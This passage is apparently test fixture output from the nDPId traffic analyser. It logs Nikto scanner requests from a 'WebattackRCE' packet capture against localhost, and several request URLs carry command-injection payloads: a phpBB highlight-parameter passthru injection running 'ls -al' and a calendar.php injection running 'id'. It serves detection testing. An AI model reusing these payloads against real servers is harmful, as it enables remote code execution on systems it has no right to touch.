-01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7440000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1576420277841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7440000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277843,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00867{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_packet_id":1,"flow_last_seen":1576420277843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":355,"pkt_l4_len":321,"thread_ts_msec":1576420277843,"pkt":"AAAAAAAAAAAAAAAACABFAAFV4EBAAEAGW2B\/AAABfwAAAccqH5AAS9kLhsuzOIAYAED\/SQAAAQEICp1m\/3udZv96R0VUIC9waHBCQi92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQoNCg=="} -01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7440000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277843,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7440000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00868{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_packet_id":1,"flow_last_seen":1576420277844,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":355,"pkt_l4_len":321,"thread_ts_msec":1576420277844,"pkt":"AAAAAAAAAAAAAAAACABFAAFVVuFAAEAG5L9\/AAABfwAAAccsH5DRJG\/rOSfatoAYAED\/SQAAAQEICp1m\/3ydZv98R0VUIC9mb3J1bS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7440000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7440000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1576420277845,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_packet_id":1,"flow_last_seen":1576420277845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":374,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":374,"pkt_l4_len":340,"thread_ts_msec":1576420277845,"pkt":"AAAAAAAAAAAAAAAACABFAAFouhJAAEAGgXt\/AAABfwAAAccuH5A6xYMmaghNdoAYAED\/XAAAAQEICp1m\/32dZv99R0VUIC9pbmRleC5waHA\/bmFtZT1QTnBocEJCMiZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxNDAwKQ0KDQo="} -01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7440000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1576420277845,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001400)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_packet_id":1,"flow_last_seen":1576420277847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277847,"pkt":"AAAAAAAAAAAAAAAACABFAADFXW9AAEAG3sF\/AAABfwAAAccwH5A6PWRZjzFeOIAYAED+uQAAAQEICp1m\/3+dZv9\/R0VUIC9tc2FkYy9tc2FkY3MuZGxsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDE0NzQpDQoNCg=="} 
-01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/msadcs.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001474)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277849,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_packet_id":1,"flow_last_seen":1576420277849,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277849,"pkt":"AAAAAAAAAAAAAAAACABFAADBYllAAEAG2dt\/AAABfwAAAccyH5AM9ltiiZJuH4AYAED+tQAAAQEICp1m\/4GdZv+AR0VUIC91cGxvYWRlci5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAxOCkNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277849,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/uploader.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003018)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7440000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1576420277850,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00800{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_packet_id":1,"flow_last_seen":1576420277850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"thread_ts_msec":1576420277850,"pkt":"AAAAAAAAAAAAAAAACABFAAEkktVAAEAGqPx\/AAABfwAAAcc0H5D516vm6SxeZoAYAED\/GAAAAQEICp1m\/4KdZv+CR0VUIC9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCg0K"} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7440000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1576420277850,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known 
Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7440000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277851,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00809{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_packet_id":1,"flow_last_seen":1576420277851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":312,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":312,"pkt_l4_len":278,"thread_ts_msec":1576420277851,"pkt":"AAAAAAAAAAAAAAAACABFAAEqh81AAEAGs\/5\/AAABfwAAAcc2H5Bgvr79vMi8roAYAED\/HgAAAQEICp1m\/4OdZv+DR0VUIC9mb3J1bS9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCg0K"} 
-01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7440000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277851,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7440000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277854,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00811{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_packet_id":1,"flow_last_seen":1576420277854,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":313,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":313,"pkt_l4_len":279,"thread_ts_msec":1576420277854,"pkt":"AAAAAAAAAAAAAAAACABFAAErhnRAAEAGtVZ\/AAABfwAAAcc4H5AJP79Gqf4KlIAYAED\/HwAAAQEICp1m\/4adZv+GR0VUIC9mb3J1bXMvY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwMzkpDQoNCg=="} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7440000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277854,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forums\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7440000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277855,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00812{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_packet_id":1,"flow_last_seen":1576420277855,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":313,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":313,"pkt_l4_len":279,"thread_ts_msec":1576420277855,"pkt":"AAAAAAAAAAAAAAAACABFAAErbT9AAEAGzot\/AAABfwAAAcc6H5Be6VQGyl7\/vYAYAED\/HwAAAQEICp1m\/4edZv+HR0VUIC9mb3J1bXovY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwMzkpDQoNCg=="} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7440000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277855,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": 
{"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forumz\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7440000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"flow_avg_l4_payload_len":248,"midstream":1,"thread_ts_msec":1576420277857,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 